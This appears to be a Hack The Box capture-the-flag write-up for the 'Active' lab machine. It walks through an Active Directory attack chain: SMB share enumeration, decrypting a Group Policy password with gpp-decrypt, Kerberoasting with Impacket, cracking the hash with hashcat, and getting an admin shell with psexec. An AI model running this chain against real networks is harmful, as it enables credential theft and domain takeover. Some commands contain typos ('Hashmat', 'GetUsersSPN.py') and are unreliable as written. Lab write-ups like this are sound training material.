Recon
The first step is to simply check for all open ports. For scanning all ports quickly I prefer rustscan.
rustscan -a [target IP] -u 5000 -- -sC -sV
The main details the scan give us is…
- Kerberos, RPC and SMB services are running on the device
- The domain controller’s name is ‘active.htb’
Make sure to add that to your /etc/hosts file
Enumeration
First we start by enumerating RPC, as we don’t have any creds we use the command…
rpcclient -U "" -H [IP]But we get nothing
Now we try out luck in SMB
smbmap -H [IP]We see that we have ‘read only’ access to a share named ‘Replication’
After some painfull enumeration, we find a groups.xml file
smbclient \\\\[ip]\\Replication
Lets download the file and examine it’s contents
mget groups.xmlOn doing some more research on this file, I come accross this webpage…
We learn that we can decrypt the password of user SVC_TGS in the file using the gpp-decrypt tool in Linux.
gpp-decrypt [Encrypted Password]Exploitation
Even with these creds, we are unable to get a shell
But with these creds we can check for kerberoastable users using SecureAuthCorp’s Impacket toolkit.
GetUsersSPN.py -dc-ip [ip] active.htb/svc_tgs -request
We now get the Administrator’s hash, let’s crack it with Hashcat. Looking at the format we get to know that the mode to set in hashcat to crack it is 13100.
Hashmat -m 13100 hash.txt /usr/share/wordlist/rockyou.txt
We now get the Adminsitrator account’s password. Let’s now try to get shell access.
For some reason we can’t get the shell with evil-winrm but we do get it with psexec
psexec.py active.htb/administrator:[pass]@[ip]
We are now Admin!
The enumeration in this box was a pain for me, but I learnt a lot from it. Hope you enjoyed this writeup.
https://www.hackthebox.eu/home/users/profile/271362
(if you enjoyed, feel free to hit the respect button, please…, it helps boost my confidence and motivates me to publish more write-ups).
